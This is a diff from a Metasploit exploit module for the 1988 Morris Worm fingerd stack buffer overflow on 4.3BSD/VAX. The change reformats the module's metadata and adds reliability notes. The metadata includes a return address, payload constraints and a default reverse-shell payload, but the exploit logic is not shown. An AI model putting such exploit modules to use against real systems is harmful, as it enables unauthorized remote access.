@@ -14,49 +14,60 @@ class MetasploitModule < Msf::Exploit::Remote
1414 prepend Msf ::Exploit ::Remote ::AutoCheck
1515
1616 def initialize ( info = { } )
17- super ( update_info ( info ,
18- 'Name' => 'Morris Worm fingerd Stack Buffer Overflow' ,
19- 'Description' => %q{
20- This module exploits a stack buffer overflow in fingerd on 4.3BSD.
21-
22- This vulnerability was exploited by the Morris worm in 1988-11-02.
23- Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
24-
25- Currently, only bsd/vax/shell_reverse_tcp is supported.
26- } ,
27- 'Author' => [
28- 'Robert Tappan Morris' , # Discovery? Exploit and worm for sure
29- 'Cliff Stoll' , # The Cuckoo's Egg epilogue and inspiration
30- 'wvu' # Module, payload, and additional research
31- ] ,
32- 'References' => [
33- [ 'URL' , 'https://en.wikipedia.org/wiki/Morris_worm' ] , # History
34- [ 'URL' , 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf' ] , # Analysis
35- [ 'URL' , 'http://computerarcheology.com/Virus/MorrisWorm/' ] , # Details
36- [ 'URL' , 'https://github.com/arialdomartini/morris-worm' ] , # Source
37- [ 'URL' , 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH' ] # Setup
38- # And credit to the innumerable VAX ISA docs on the Web
39- ] ,
40- 'DisclosureDate' => '1988-11-02' ,
41- 'License' => MSF_LICENSE ,
42- 'Platform' => 'bsd' ,
43- 'Arch' => ARCH_VAX ,
44- 'Privileged' => false , # Depends on inetd.conf, usually "nobody"
45- 'Targets' => [
46- # https://en.wikipedia.org/wiki/Source_Code_Control_System
47- [ '@(#)fingerd.c 5.1 (Berkeley) 6/6/85' ,
48- 'Ret' => 0x7fffe9b0 ,
49- 'Payload' => {
50- 'Space' => 403 ,
51- 'BadChars' => "\n " ,
52- 'Encoder' => 'generic/none' , # There is no spoon
53- 'DisableNops' => true # Hardcoded NOPs
54- }
55- ]
56- ] ,
57- 'DefaultTarget' => 0 ,
58- 'DefaultOptions' => { 'PAYLOAD' => 'bsd/vax/shell_reverse_tcp' }
59- ) )
17+ super (
18+ update_info (
19+ info ,
20+ 'Name' => 'Morris Worm fingerd Stack Buffer Overflow' ,
21+ 'Description' => %q{
22+ This module exploits a stack buffer overflow in fingerd on 4.3BSD.
23+
24+ This vulnerability was exploited by the Morris worm in 1988-11-02.
25+ Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
26+
27+ Currently, only bsd/vax/shell_reverse_tcp is supported.
28+ } ,
29+ 'Author' => [
30+ 'Robert Tappan Morris' , # Discovery? Exploit and worm for sure
31+ 'Cliff Stoll' , # The Cuckoo's Egg epilogue and inspiration
32+ 'wvu' # Module, payload, and additional research
33+ ] ,
34+ 'References' => [
35+ [ 'URL' , 'https://en.wikipedia.org/wiki/Morris_worm' ] , # History
36+ [ 'URL' , 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf' ] , # Analysis
37+ [ 'URL' , 'http://computerarcheology.com/Virus/MorrisWorm/' ] , # Details
38+ [ 'URL' , 'https://github.com/arialdomartini/morris-worm' ] , # Source
39+ [ 'URL' , 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH' ] # Setup
40+ # And credit to the innumerable VAX ISA docs on the Web
41+ ] ,
42+ 'DisclosureDate' => '1988-11-02' ,
43+ 'License' => MSF_LICENSE ,
44+ 'Platform' => 'bsd' ,
45+ 'Arch' => ARCH_VAX ,
46+ 'Privileged' => false , # Depends on inetd.conf, usually "nobody"
47+ 'Targets' => [
48+ # https://en.wikipedia.org/wiki/Source_Code_Control_System
49+ [
50+ '@(#)fingerd.c 5.1 (Berkeley) 6/6/85' ,
51+ {
52+ 'Ret' => 0x7fffe9b0 ,
53+ 'Payload' => {
54+ 'Space' => 403 ,
55+ 'BadChars' => "\n " ,
56+ 'Encoder' => 'generic/none' , # There is no spoon
57+ 'DisableNops' => true # Hardcoded NOPs
58+ }
59+ }
60+ ]
61+ ] ,
62+ 'DefaultTarget' => 0 ,
63+ 'DefaultOptions' => { 'PAYLOAD' => 'bsd/vax/shell_reverse_tcp' } ,
64+ 'Notes' => {
65+ 'Reliability' => [ REPEATABLE_SESSION ] ,
66+ 'Stability' => [ CRASH_SERVICE_RESTARTS ] ,
67+ 'SideEffects' => [ IOC_IN_LOGS ]
68+ }
69+ )
70+ )
6071
6172 register_options ( [ Opt ::RPORT ( 79 ) ] )
6273 end
0 commit comments